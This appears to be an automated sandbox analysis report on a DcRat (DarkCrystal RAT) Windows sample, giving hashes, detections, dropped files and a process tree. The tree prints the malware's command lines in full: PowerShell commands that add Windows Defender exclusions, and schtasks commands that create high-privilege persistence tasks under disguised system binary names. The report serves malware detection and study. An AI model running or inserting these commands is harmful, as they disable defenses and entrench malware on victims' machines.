Analysis
max time kernel: 150s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-12-2024 04:28
Behavioral task: behavioral1
Sample: JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe
Resource: win7-20240903-en

Behavioral task: behavioral2
Sample: JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe
Resource: win10v2004-20241007-en
General
Target: JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe
Size: 1.3MB
MD5: 86530bf4b3d606a1f3031a93d8d02712
SHA1: 9a4ebab5ec898e73aa30c28fd695ec95e6e6e22b
SHA256: 28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7
SHA512: f42cc0f5a0a1a909a9f16a6c08a882dee15ca34e4b6514d2e35c3eb3a0206f11f8cb8230c483baede054248bd93afafe505e524c4d7549aa9e8afb983d1fe771
SSDEEP: 24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg
Malware Config

Signatures

DcRat
DarkCrystal (DC) is a .NET RAT, active since June 2019, that is capable of loading additional plugins.

Dcrat family
Process spawned unexpected child process (36 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
All 36 entries share the same description: Parent C:\Windows\system32\wbem\wmiprvse.exe (pid_target 3588) is not expected to spawn this process (Process schtasks.exe, procid_target 86). schtasks.exe pids: 5036, 5084, 2636, 2800, 3680, 2012, 4148, 444, 292, 2112, 3020, 392, 3112, 4712, 1364, 2972, 2232, 4512, 808, 5064, 2328, 1448, 3128, 1476, 4124, 1468, 2932, 2584, 4452, 3460, 1064, 3596, 1168, 5096, 776, 1268.
resource / yara_rule:
- behavioral2/files/0x000a000000023b8a-10.dat: dcrat
- behavioral2/memory/3544-13-0x0000000000780000-0x0000000000890000-memory.dmp: dcrat
Command and Scripting Interpreter: PowerShell (1 TTP, 13 IoCs)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
pid / Process: powershell.exe pids 3352, 3524, 1808, 4056, 1216, 2508, 4776, 296, 3320, 2744, 5000, 4108, 3628.
Checks computer location settings (2 TTPs, 14 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
Key value queried: \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation, by the following processes:
- JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe (1 entry)
- WmiPrvSE.exe (11 entries)
- WScript.exe (1 entry)
- DllCommonsvc.exe (1 entry)
Executes dropped EXE (13 IoCs)
pid / Process:
- 3544 DllCommonsvc.exe
- WmiPrvSE.exe pids 4448, 4712, 4528, 2928, 4752, 2972, 4548, 948, 1452, 2404, 2308, 4056
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 12 IoCs)
flow / ioc: all 12 flows (ids 49, 19, 36, 46, 47, 48, 50, 20, 22, 37, 40, 41) go to raw.githubusercontent.com.
Drops file in Program Files directory (10 IoCs)
description / ioc / Process (all by DllCommonsvc.exe):
- File created C:\Program Files\WindowsPowerShell\Configuration\Registration\explorer.exe
- File created C:\Program Files\WindowsPowerShell\Configuration\Registration\7a0fd90576e088
- File created C:\Program Files\Windows Media Player\Network Sharing\DllCommonsvc.exe
- File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\9e8d7a4ca61bd9
- File created C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Registry.exe
- File created C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\ee2ad38f3d4382
- File created C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe
- File created C:\Program Files (x86)\WindowsPowerShell\Modules\9e8d7a4ca61bd9
- File created C:\Program Files\Windows Media Player\Network Sharing\a76d7bf15d8370
- File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe
Drops file in Windows directory (9 IoCs)
description / ioc / Process (all by DllCommonsvc.exe):
- File created C:\Windows\System\RuntimeBroker.exe
- File created C:\Windows\System\9e8d7a4ca61bd9
- File created C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
- File created C:\Windows\ImmersiveControlPanel\0a1fd5f707cd16
- File created C:\Windows\Migration\WTR\System.exe
- File opened for modification C:\Windows\System\RuntimeBroker.exe
- File created C:\Windows\SystemResources\Windows.UI.Search\Images\24dbde2999530e
- File created C:\Windows\ImmersiveControlPanel\sppsvc.exe
- File created C:\Windows\Migration\WTR\27d1bcfc3c54e0
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
Attempts to gather information about the system language of a victim host in order to infer its geographical location.
Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by the following processes:
- WScript.exe
- cmd.exe
- JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe
Modifies registry class (13 IoCs)
Key created: \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings, by the following processes:
- WmiPrvSE.exe (11 entries)
- DllCommonsvc.exe (1 entry)
- JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe (1 entry)
Scheduled Task/Job: Scheduled Task (1 TTP, 36 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid / Process: schtasks.exe pids 4712, 2232, 1476, 4124, 5036, 2932, 2584, 5096, 3112, 808, 1468, 776, 5084, 2800, 4148, 1064, 292, 1364, 4512, 3128, 2636, 2112, 2328, 1268, 5064, 1448, 3596, 1168, 2012, 3020, 392, 2972, 3680, 444, 4452, 3460.
Suspicious behavior: EnumeratesProcesses (54 IoCs)
pid / Process:
- 3544 DllCommonsvc.exe (3 entries)
- powershell.exe, 3 entries each: 4056, 3628, 4108, 4776, 3524, 1808, 2744, 296, 5000, 3320, 3352, 1216, 2508
- WmiPrvSE.exe, 1 entry each: 4448, 4712, 4528, 2928, 4752, 2972, 4548, 948, 1452, 2404, 2308, 4056
Suspicious use of AdjustPrivilegeToken (26 IoCs)
description / pid / Process (all entries: Token: SeDebugPrivilege):
- 3544 DllCommonsvc.exe
- powershell.exe pids 4056, 3628, 4108, 4776, 3524, 5000, 1808, 2744, 296, 3320, 3352, 1216, 2508
- WmiPrvSE.exe pids 4448, 4712, 4528, 2928, 4752, 2972, 4548, 948, 1452, 2404, 2308, 4056
Suspicious use of WriteProcessMemory (64 IoCs)
description / pid / Process / procid_target:
- PID 3336 (JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe) wrote to memory of 4024, procid_target 82 (3 entries)
- PID 4024 (WScript.exe) wrote to memory of 360, procid_target 87 (3 entries)
- PID 360 (cmd.exe) wrote to memory of 3544, procid_target 89 (2 entries)
- PID 3544 (DllCommonsvc.exe) wrote to memory of 4056, procid_target 126 (2 entries)
- PID 3544 (DllCommonsvc.exe) wrote to memory of 1216, procid_target 127 (2 entries)
- PID 3544 (DllCommonsvc.exe) wrote to memory of 2508, procid_target 128 (2 entries)
- PID 3544 (DllCommonsvc.exe) wrote to memory of 4776, procid_target 129 (2 entries)
- PID 3544 (DllCommonsvc.exe) wrote to memory of 296, procid_target 130 (2 entries)
- PID 3544 (DllCommonsvc.exe) wrote to memory of 5000, procid_target 131 (2 entries)
- PID 3544 (DllCommonsvc.exe) wrote to memory of 3524, procid_target 132 (2 entries)
- PID 3544 (DllCommonsvc.exe) wrote to memory of 3352, procid_target 133 (2 entries)
- PID 3544 (DllCommonsvc.exe) wrote to memory of 4108, procid_target 134 (2 entries)
- PID 3544 (DllCommonsvc.exe) wrote to memory of 2744, procid_target 140 (2 entries)
- PID 3544 (DllCommonsvc.exe) wrote to memory of 3628, procid_target 141 (2 entries)
- PID 3544 (DllCommonsvc.exe) wrote to memory of 3320, procid_target 142 (2 entries)
- PID 3544 (DllCommonsvc.exe) wrote to memory of 1808, procid_target 143 (2 entries)
- PID 3544 (DllCommonsvc.exe) wrote to memory of 3760, procid_target 151 (2 entries)
- PID 3760 (cmd.exe) wrote to memory of 2244, procid_target 155 (2 entries)
- PID 3760 (cmd.exe) wrote to memory of 4448, procid_target 158 (2 entries)
- PID 4448 (WmiPrvSE.exe) wrote to memory of 2256, procid_target 159 (2 entries)
- PID 2256 (cmd.exe) wrote to memory of 2008, procid_target 161 (2 entries)
- PID 2256 (cmd.exe) wrote to memory of 4712, procid_target 162 (2 entries)
- PID 4712 (WmiPrvSE.exe) wrote to memory of 3512, procid_target 164 (2 entries)
- PID 3512 (cmd.exe) wrote to memory of 3628, procid_target 166 (2 entries)
- PID 3512 (cmd.exe) wrote to memory of 4528, procid_target 168 (2 entries)
- PID 4528 (WmiPrvSE.exe) wrote to memory of 3612, procid_target 169 (2 entries)
- PID 3612 (cmd.exe) wrote to memory of 4740, procid_target 171 (2 entries)
- PID 3612 (cmd.exe) wrote to memory of 2928, procid_target 172 (2 entries)
- PID 2928 (WmiPrvSE.exe) wrote to memory of 5028, procid_target 173 (2 entries)
- PID 5028 (cmd.exe) wrote to memory of 5076, procid_target 175 (2 entries)
- PID 5028 (cmd.exe) wrote to memory of 4752, procid_target 176 (2 entries)
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

[level 1] C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe"
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID: 3336

[level 2] C:\Windows\SysWOW64\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 4024

[level 3] C:\Windows\SysWOW64\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 360

[level 4] C:\providercommon\DllCommonsvc.exe
Command line: "C:\providercommon\DllCommonsvc.exe"
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 3544

[level 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 4056

[level 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System\RuntimeBroker.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 1216

[level 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\explorer.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2508

[level 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 4776

[level 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\Network Sharing\DllCommonsvc.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 296

[level 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Adobe\WmiPrvSE.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 5000

[level 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3524

[level 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ImmersiveControlPanel\sppsvc.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3352

[level 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 4108

[level 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Migration\WTR\System.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2744

[level 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\DllCommonsvc.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3628

[level 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dwm.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3320

[level 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Registry.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 1808
[level 5] C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\I1ExlHFW7K.bat"
- Suspicious use of WriteProcessMemory
PID: 3760

[level 6] C:\Windows\system32\w32tm.exe
Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
PID: 2244

[level 6] C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
Command line: "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 4448

[level 7] C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zDcPfnAXs0.bat"
- Suspicious use of WriteProcessMemory
PID: 2256

[level 8] C:\Windows\system32\w32tm.exe
Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
PID: 2008

[level 8] C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
Command line: "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 4712

[level 9] C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pkopelt31u.bat"
- Suspicious use of WriteProcessMemory
PID: 3512

[level 10] C:\Windows\system32\w32tm.exe
Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
PID: 3628

[level 10] C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
Command line: "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 4528

[level 11] C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vCRFnHZZKP.bat"
- Suspicious use of WriteProcessMemory
PID: 3612

[level 12] C:\Windows\system32\w32tm.exe
Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
PID: 4740

[level 12] C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
Command line: "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 2928

[level 13] C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pI0EcicZAo.bat"
- Suspicious use of WriteProcessMemory
PID: 5028

[level 14] C:\Windows\system32\w32tm.exe
Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
PID: 5076

[level 14] C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
Command line: "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 4752

[level 15] C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\F1gdtReUkn.bat"
PID: 4956

[level 16] C:\Windows\system32\w32tm.exe
Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
PID: 4524

[level 16] C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
Command line: "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2972

[level 17] C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\574RqM7W2b.bat"
PID: 2000

[level 18] C:\Windows\system32\w32tm.exe
Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
PID: 4984

[level 18] C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
Command line: "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 4548

[level 19] C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NfeiSKMyn5.bat"
PID: 660

[level 20] C:\Windows\system32\w32tm.exe
Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
PID: 4188

[level 20] C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
Command line: "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 948

[level 21] C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EqBdbgL5Ji.bat"
PID: 4032

[level 22] C:\Windows\system32\w32tm.exe
Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
PID: 4712

[level 22] C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
Command line: "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 1452

[level 23] C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lHo4kC1bcD.bat"
PID: 2488

[level 24] C:\Windows\system32\w32tm.exe
Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
PID: 4812

[level 24] C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
Command line: "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2404

[level 25] C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\D5faDLbbQ0.bat"
PID: 1216

[level 26] C:\Windows\system32\w32tm.exe
Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
PID: 2904

[level 26] C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
Command line: "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2308

[level 27] C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pbgl9PPr7s.bat"
PID: 2340

[level 28] C:\Windows\system32\w32tm.exe
Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
PID: 4640

[level 28] C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
Command line: "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 4056
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\System\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5036
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System\RuntimeBroker.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5084
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\System\RuntimeBroker.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2636
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Registration\explorer.exe'" /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2800
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\Configuration\Registration\explorer.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3680
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Registration\explorer.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2012
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'" /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4148
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:444
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:292
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Media Player\Network Sharing\DllCommonsvc.exe'" /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2112
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Network Sharing\DllCommonsvc.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3020
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Media Player\Network Sharing\DllCommonsvc.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:392
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Adobe\WmiPrvSE.exe'" /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3112
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\All Users\Adobe\WmiPrvSE.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4712
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Adobe\WmiPrvSE.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1364
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe'" /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2972
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2232
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4512
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Windows\ImmersiveControlPanel\sppsvc.exe'" /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:808
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\ImmersiveControlPanel\sppsvc.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5064
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Windows\ImmersiveControlPanel\sppsvc.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2328
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe'" /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1448
-
C:\Windows\system32\schtasks.exe (depth 1)
